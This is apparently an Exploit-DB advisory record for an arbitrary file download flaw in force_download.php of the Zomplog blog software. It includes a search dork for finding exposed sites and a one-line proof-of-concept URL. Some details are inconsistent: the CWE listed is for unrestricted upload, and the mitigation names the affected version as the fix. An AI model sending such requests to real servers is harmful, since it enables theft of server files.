Vendor: Zomplog
By: Stack-Terrorist
CVSS: 7.5 (HIGH)
File Disclosure
CWE: 434
Product Name: Zomplog
Affected Version From: 3.8.2002
Affected Version To: All
Patch Exists: Yes
Related CWE: N/A
CPE: a:zomp:zomplog
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Zomplog 3.8.2 <= file disclosure

The vulnerability is caused by insufficient validation of the user-supplied 'file' parameter in the 'force_download.php' script. A remote attacker can download arbitrary files from the vulnerable server.

Mitigation:

Upgrade to the latest version of Zomplog 3.8.2 or later.

Exploit-DB raw data:

Name:  "Zomplog 3.8.2 <= file disclouse"
Version: All
Script Download: http://www.zomp.nl/zomplog/
DORK: "powered by zomplog"
Discovered By: Stack-Terrorist

Exploit:
http://localhost/path/upload/force_download.php?file=force_download.php
 
thnx : alah 

# milw0rm.com [2008-05-16]